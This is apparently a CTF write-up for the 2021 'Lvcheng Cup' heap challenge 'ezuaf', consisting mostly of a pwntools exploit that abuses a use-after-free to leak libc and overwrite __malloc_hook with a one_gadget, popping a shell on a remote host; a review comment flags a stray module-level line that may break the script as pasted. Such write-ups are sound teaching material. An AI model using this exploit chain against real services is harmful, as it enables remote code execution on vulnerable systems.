2021年“绿城杯”网络安全大赛-PWN-ezuaf
题目名称:ezuaf
题目内容:简单的uaf
题目分值:100.0
题目难度:容易
相关附件:ezuaf的附件24.txt
解题思路:
1.检查保护
2.函数分析
发现Delete中有uaf
3.思路
打malloc_hook
exp
from pwn import *
#io = process('./uaf_pwn')
# Target connection: the remote endpoint given on the page (the commented-out
# process() line above is the local variant of the same script).
io = remote('82.157.5.28',52402)
elf = ELF('./uaf_pwn')
# The author's local copy of the 2.23-0ubuntu11.3 amd64 libc; the symbol
# offsets used below (__malloc_hook, __libc_realloc, system) are read from it,
# so the path must point at the same build the remote service runs.
libc = ELF('/home/wenwenyuyu/Desktop/glibc/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
# Candidate one_gadget offsets for that libc build, as listed on the page;
# index 1 is the one the exploit sequence selects.
one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
def add(size: int) -> None:
    """Menu option 1: ask the target to allocate a chunk of `size` bytes.

    Waits for the '>' prompt, selects option 1, then answers the 'size>'
    prompt. The slot index of the new chunk is not returned; the exploit
    tracks it by allocation order in trailing comments (#1, #2, ...).
    """
    io.recvuntil('>')
    io.sendline('1')
    io.sendlineafter('size>', str(size))
def delete(index: int) -> None:
    """Menu option 2: free the chunk held in slot `index`.

    Per the page this is where the use-after-free lives: the slot is not
    cleared after free(), so later show()/edit() calls on the same index still
    reach the freed chunk. The server-side fix is to null the slot after
    free() and reject stale or out-of-range indices.
    """
    io.recvuntil('>')
    io.sendline('2')
    io.sendlineafter('index>', str(index))
def edit(index: int, content: bytes) -> None:
    """Menu option 3: write `content` into the chunk held in slot `index`.

    `content` goes through sendlineafter, so a newline is appended to it; the
    live calls pass p64()/bytes payloads. Because delete() leaves the slot in
    place, this also writes into freed chunks, which is the UAF write the
    exploit relies on.
    """
    io.recvuntil('>')
    io.sendline('3')
    io.sendlineafter('index>', str(index))
    io.sendlineafter('content>', content)
def show(index: int) -> None:
    """Menu option 4: ask the target to print the chunk held in slot `index`.

    Only sends the request; the caller reads the response (see the
    u64(io.recv(6)) after show(0)). Used on a freed chunk it reads freed
    memory, which is the UAF read the libc leak is built on.
    """
    io.recvuntil('>')
    io.sendline('4')
    io.sendlineafter('index>', str(index))
# NOTE(review): indentation was lost in this paste. As written these two lines
# run at module level before any menu interaction, where recv(14) would read
# the menu banner and int(..., 16) would presumably raise ValueError; they look
# like a leftover heap-leak helper (possibly the tail of show()). Nothing below
# uses `heap` — confirm against the original script.
heap = int(io.recv(14), 16)
log.info('heap = ' + hex(heap))
# --- Exploit sequence -------------------------------------------------------
# Root cause (per the page): delete() frees a chunk but the slot still refers
# to it, so show()/edit() read and write freed memory. The chain below also
# depends on glibc 2.23 heap behaviour; tcache (>= 2.26), fastbin safe-linking
# (>= 2.32) and the removal of __malloc_hook (>= 2.34) each break a step of it.
#
# Chunk 0 (0x80 request -> 0x90 chunk) is above the fastbin limit, so freeing
# it places it in the unsorted bin with its fd pointing into main_arena.
# Chunks 1 and 2 sit between it and the top chunk so it is not consolidated.
add(0x80)
add(0x60)#1
add(0x10)#2
delete(0)
# Leak: show() on the freed slot prints the chunk's fd; 0x3c4b78 is the
# main_arena-relative offset the page uses for this libc build.
show(0)
data = u64(io.recv(6).ljust(8, b'\x00'))
log.info('data = ' + hex(data))
libc_base = data - 0x3c4b78
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['__libc_realloc']
system = libc_base + libc.sym['system']  # only used by the disabled variant below
one = one_gadget[1] + libc_base
log.info('one = ' + hex(one))
# Fastbin corruption through the same UAF: chunk 1 (0x70 chunk) is freed and
# its fd is overwritten via edit(), so the next two 0x60 requests hand back
# chunk 1 and then a fake chunk just before __malloc_hook (the -0x23 offset is
# chosen so the bytes there pass as a 0x7f size field).
delete(1)
edit(1, p64(malloc_hook - 0x23))
add(0x60)#3
add(0x60)#4  # this one is the fake chunk near __malloc_hook
# Fake chunk user data starts at malloc_hook-0x13: 11 filler bytes reach
# __realloc_hook (8 bytes before __malloc_hook in this libc), which gets the
# one_gadget, and __malloc_hook gets __libc_realloc+4 — presumably to skip
# realloc's first instruction so the stack layout satisfies the one_gadget's
# constraint when it is entered through the hook.
payload = b'a'*11 + p64(one) + p64(realloc + 4)
'''
edit(3, '/bin/sh\x00')
edit(4, p64(system))
delete(3)
'''
edit(4,payload)
# Any further malloc() now goes through the overwritten hooks.
add(0x10)
io.interactive()
#gdb.attach(io)
DASCTF{d4a7f835c774ce058d8a327bd2a5ed14}